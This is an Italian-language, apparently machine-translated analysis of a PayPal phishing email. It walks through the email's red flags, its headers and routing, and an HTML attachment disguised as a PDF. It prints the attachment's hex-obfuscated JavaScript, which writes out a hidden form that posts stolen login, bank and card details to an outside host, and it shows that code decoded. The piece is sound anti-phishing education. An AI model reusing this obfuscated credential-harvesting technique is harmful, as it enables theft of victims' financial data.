10Sep
Nel mondo odierno in cui le informazioni di tutti sono online, il phishing è uno degli attacchi online più popolari e devastanti, perché puoi sempre pulire un virus, ma se i tuoi dati bancari vengono rubati, sei nei guai. Ecco una ripartizione di uno di questi attacchi che abbiamo ricevuto.
Non pensare che siano solo i tuoi dettagli bancari che sono importanti: dopo tutto, se qualcuno ottiene il controllo sul tuo account, non solo conosce le informazioni contenute in quell'account, ma le probabilità sono che le stesse informazioni di accesso possano essere usate su varialtri account. E se compromettono il tuo account di posta elettronica, possono ripristinare tutte le altre password.
Quindi, oltre a mantenere password forti e variabili, devi sempre essere alla ricerca di e-mail fasulle che si mascherano come la cosa reale. Mentre la maggior parte dei tentativi di phishing sono amatoriali, alcuni sono abbastanza convincenti, quindi è importante capire come riconoscerli a livello di superficie e come funzionano sotto il cofano.
Immagine di ASIRAP
Esame di ciò che è in Plain Sight
La nostra email di esempio, come la maggior parte dei tentativi di phishing, "notifica" l'utente sul tuo account PayPal che, in circostanze normali, sarebbe allarmante. Quindi l'invito all'azione è di verificare / ripristinare il tuo account inviando quasi tutte le informazioni personali che puoi immaginare. Di nuovo, questo è abbastanza formidabile.
Anche se ci sono certamente delle eccezioni, praticamente tutte le e-mail di phishing e truffa sono caricate con le bandiere rosse direttamente nel messaggio stesso. Anche se il testo è convincente, di solito puoi trovare molti errori disseminati nel corpo del messaggio che indicano che il messaggio non è legittimo.
The Message Body
A prima vista, questa è una delle migliori email di phishing che ho visto. Non ci sono errori di ortografia o grammaticali e la verbosità si legge in base a ciò che potresti aspettarti. Tuttavia, ci sono alcune bandiere rosse che puoi vedere quando esamini il contenuto un po 'più da vicino.
- "Paypal" - Il caso corretto è "PayPal"( maiuscola P).Puoi vedere entrambe le varianti sono usate nel messaggio. Le aziende sono molto intenzionate con il loro marchio, quindi è dubbio che qualcosa del genere supererebbe il processo di correzione.
- "Consenti ActiveX" - Quante volte hai visto un business basato sul Web legittimo, le dimensioni di Paypal utilizzano un componente proprietario che funziona solo su un singolo browser, specialmente quando supportano più browser? Certo, da qualche parte là fuori qualche azienda lo fa, ma questa è una bandiera rossa.
- "in modo sicuro". - Si noti come questa parola non si allinea al margine con il resto del testo del paragrafo. Anche se allungo un po 'la finestra, non si avvolge o non si spazia correttamente.
- "Paypal!" - Lo spazio prima del punto esclamativo sembra imbarazzante. Solo un'altra stranezza che sono sicuro non sarebbe in una email legittima.
- "PayPal- Account Update Form.pdf.htm" - Perché Paypal dovrebbe allegare un "PDF" soprattutto quando potevano semplicemente collegarsi a una pagina sul loro sito? Inoltre, perché dovrebbero cercare di camuffare un file HTML come PDF?Questa è la più grande bandiera rossa di tutti loro.
L'intestazione del messaggio
Quando dai un'occhiata all'intestazione del messaggio, compaiono un paio di altre bandiere rosse:
- L'indirizzo è [email protected].
- Manca l'indirizzo. Non l'ho escluso, semplicemente non fa parte dell'intestazione del messaggio standard. In genere un'azienda che ha il tuo nome personalizzerà l'email per te.
L'allegato
Quando apro l'allegato, è possibile vedere immediatamente che il layout non è corretto in quanto manca le informazioni sullo stile. Ancora una volta, perché PayPal dovrebbe inviare via email un modulo HTML quando potrebbe semplicemente darti un link sul loro sito?
Nota: abbiamo utilizzato il visualizzatore di allegati HTML di Gmail per questo, ma ti consigliamo di NON APRIRE gli allegati da scammer. Mai. Mai. Molto spesso contengono exploit che installano trojan sul tuo PC per rubare le informazioni del tuo account.
Scorrendo verso il basso un po 'di più puoi vedere che questo modulo chiede non solo i nostri dati di accesso PayPal, ma anche informazioni bancarie e della carta di credito. Alcune delle immagini sono rotte.
È ovvio che questo tentativo di phishing stia andando dietro a tutto con un solo colpo.
The Technical Breakdown
Mentre dovrebbe essere abbastanza chiaro sulla base di ciò che è in bella vista che si tratta di un tentativo di phishing, ora stiamo andando a rompere il trucco tecnico della mail e vedere cosa possiamo trovare. Informazioni
dall'Allegato
La prima cosa da dare un'occhiata è la fonte HTML del modulo allegato che è ciò che invia i dati al sito fasullo.
Quando visualizzi rapidamente la fonte, tutti i link appaiono validi in quanto puntano a "paypal.com" o "paypalobjects.com" che sono entrambi legittimi.
Ora daremo un'occhiata ad alcune informazioni di base sulla pagina che Firefox raccoglie sulla pagina.
Come puoi vedere, alcuni elementi grafici vengono estratti dai domini "blessedtobe.com", "goodhealthpharmacy.com" e "pic-upload.de" invece dei domini legittimi di PayPal. Informazioni
dalle intestazioni dell'email
Successivamente daremo un'occhiata alle intestazioni dei messaggi di posta elettronica non elaborati. Gmail lo rende disponibile tramite l'opzione di menu Mostra originale sul messaggio.
Guardando le informazioni di intestazione per il messaggio originale, è possibile vedere questo messaggio è stato composto utilizzando Outlook Express 6. Dubito che PayPal abbia qualcuno sul personale che invia ciascuno di questi messaggi manualmente tramite un client di posta elettronica obsoleto.
Ora guardando le informazioni di routing, possiamo vedere l'indirizzo IP sia del mittente che del relay mail server.
L'indirizzo IP "Utente" è il mittente originale. Facendo una rapida ricerca sulle informazioni IP, possiamo vedere che l'IP di invio è in Germania.
E quando guardiamo il relay mailing server( mail.itak.at), indirizzo IP possiamo vedere che questo è un ISP basato in Austria. Dubito che PayPal instradi le loro e-mail direttamente attraverso un ISP con sede in Austria quando hanno una massiccia server farm che potrebbe facilmente gestire questa attività.
Dove vanno i dati?
Quindi abbiamo chiaramente stabilito che si tratta di una e-mail di phishing e abbiamo raccolto alcune informazioni sulla provenienza del messaggio, ma su dove sono stati inviati i tuoi dati?
Per vedere questo, dobbiamo prima salvare l'allegato HTM sul desktop e aprirlo in un editor di testo. Scorrendolo, tutto sembra essere in ordine salvo quando arriviamo a un blocco Javascript che sembra sospetto.
Scomponendo la fonte completa dell'ultimo blocco di Javascript, vediamo:
& lt; linguaggio di script = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Ogni volta che vedi una grande stringa confusa di lettere e numeri apparentemente casuali incorporati in un blocco Javascript, di solito è qualcosa di sospetto. Guardando il codice, la variabile "x" è impostata su questa stringa grande e quindi decodificata nella variabile "y".Il risultato finale della variabile "y" viene quindi scritto nel documento come HTML.
Poiché la stringa grande è fatta di numeri 0-9 e le lettere AF, è più probabile codificato tramite un semplice ASCII alla conversione Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
traduce:
& lt; form name =”main” id =”main”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Non è una coincidenza che questo decodifica in un tag form HTML valido che invia i risultati non a PayPal, ma a un sito canaglia.
Inoltre, quando si visualizza l'origine HTML del modulo, si noterà che questo tag non è visibile perché è generato dinamicamente tramite Javascript. Questo è un modo intelligente per nascondere ciò che l'HTML sta effettivamente facendo se qualcuno dovesse semplicemente visualizzare la sorgente generata dell'allegato( come abbiamo fatto in precedenza) anziché aprire l'allegato direttamente in un editor di testo.
Eseguendo un rapido whois sul sito incriminato, possiamo vedere che questo è un dominio ospitato su un host web popolare, 1 e 1.
Ciò che emerge è che il dominio utilizza un nome leggibile( al contrario di qualcosa come "dfh3sjhskjhw.net") e il dominio è stato registrato per 4 anni. Per questo motivo, credo che questo dominio sia stato dirottato e utilizzato come pedina in questo tentativo di phishing. Il cinismo
è una buona difesa
Quando si tratta di stare al sicuro online, non fa mai male avere un po 'di cinismo.
Mentre sono sicuro che ci sono altre bandiere rosse nell'e-mail di esempio, ciò che abbiamo sottolineato sopra sono indicatori che abbiamo visto dopo pochi minuti di esame. Ipoteticamente, se il livello di superficie del messaggio di posta elettronica imitasse la sua controparte legittima al 100%, l'analisi tecnica rivelerebbe ancora la sua vera natura. Questo è il motivo per cui è importante poter esaminare sia ciò che puoi e che non puoi vedere.